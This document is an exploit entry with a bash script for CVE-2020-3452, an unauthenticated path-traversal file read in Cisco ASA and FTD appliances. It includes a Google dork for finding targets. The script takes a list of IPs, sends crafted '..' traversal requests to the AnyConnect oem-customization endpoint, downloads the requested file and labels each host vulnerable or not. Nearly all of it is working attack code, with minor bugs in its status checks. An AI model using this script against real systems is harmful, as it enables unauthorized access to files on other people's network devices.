# Exploit Title: Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion # Google Dork: inurl:/+CSCOE+/ # Date: 2020-08-27 # Exploit Author: 0xmmnbassel # Vendor Homepage: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 # Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60 # Vulnerability Type: unauthenticated file read # CVE: CVE-2020-3452 #!/bin/bash read="%2bCSCOE%2b/portal_inc.lua" helpFunction() { echo "" echo -e "\t\tCVE-2020-3452" echo "" echo "Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua " echo -e "\t-l for list of IPs in text file" echo -e "\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua" echo -e "\t-i for single IP test" exit 1 } while getopts "l:r:i:" opt do case "$opt" in l ) input="$OPTARG" ;; r ) read="$OPTARG" ;; i ) website="$OPTARG" ;; ? ) helpFunction ;; esac done #if $website is empty or $input is empty if [ -z "$website" ] && [ -z "$input" ] then echo "Some/all of the parameters are empty"; helpFunction fi #usage if [ -z "$website"]; then while IFS= read -r line do name=$(echo $line | cut -c9-19) #echo "testing $line" filename="$name.txt" #echo $response status=$(curl -LI $line"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name="$read -o /dev/null -w '%{http_code}\n' -s) if [ $status -eq "400" ]; then echo "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!" else wget "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read" -O $name.txt if [ -s $filename ]; then echo "$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read..." echo "downloaded!, $line is vulnerable to CVE-2020-3452." else echo "not vulnerable!" rm -rf $filename fi fi done < "$input" else name=$(echo $website | cut -c9-16) filename="$name.txt" status=$(curl -LI $website"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name="$read -o /dev/null -w '%{http_code}\n' -s) if [ $status -eq "Bad Request" ]; then echo "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!" else echo "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read..." wget "$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read" -O $name.txt if [ -s $filename ]; then echo "downloaded!, $website is vulnerable to CVE-2020-3452." else echo "not vulnerable!" rm -rf $filename fi fi fi